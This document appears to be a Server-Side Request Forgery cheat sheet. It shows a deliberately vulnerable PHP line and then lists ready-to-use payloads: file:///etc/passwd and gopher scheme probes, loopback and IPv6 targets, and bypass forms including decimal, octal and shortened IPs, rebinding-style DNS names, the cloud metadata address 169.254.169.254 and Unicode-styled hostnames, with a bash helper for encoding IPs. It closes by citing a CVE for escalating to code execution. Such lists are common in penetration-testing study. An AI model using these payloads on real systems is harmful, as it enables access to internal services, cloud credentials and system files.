Server Side Request Forgery (SSRF)
A Server-Side Request Forgery (SSRF) attack involves an attacker abusing server functionality to access or modify resources. The attacker targets an application that supports data imports from URLs or allows them to read data from URLs.
Example of vulnerable PHP code
<?php
file_get_contents($_GET['file']);
?>
Schema
HTTP
http://localhost
FILE
file:///etc/passwd
gopher
gopher://127.0.0.1/
FTP
ftp://127.0.0.1:21
Payloads
localhost
localhost
localhost:8080
127.0.0.1
127.0.0.1
127.0.0.1:8080
loop back
127.0.0.1
127.0.0.2
127.0.0.3
IPV6
http://[::ffff:7f00:1]/
HTTPS
https://localhost
https://127.0.0.1
https://127.0.0.2
https://[::ffff:7f00:1]/
Bypass payloads
Bypass using a decimal IP
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://2852039166/ = http://169.254.169.254
http://3232235777/ = http://192.168.1.1
How to create decimal IP?
ip_to_decimal() {
local a b c d
IFS=. read -r a b c d <<< "$1"
echo $((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))
}
ip_to_decimal 127.0.0.1
Replace 127.0.0.1 with your payload IP address.
Bypass using rare address
http://0/
http://127.1
http://127.0.1
Bypass using octal IP
http://0o177.0.0.1/ = http://127.0.0.1
Bypass using IPv6/IPv4 Address Embedding
http://[0:0:0:0:0:ffff:127.0.0.1]
http://[::ffff:127.0.0.1]
You can learn more here.
Bypass using DNS
localtest.me
localh.st
You can create your own domain at duckdns then point IP to 127.0.0.1 .
Bypass using enclosed alphanumerics
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
Useful tools
New CVEs
- CVE-2024-2961 can improve SSRF to RCE in PHP8.1 web applications.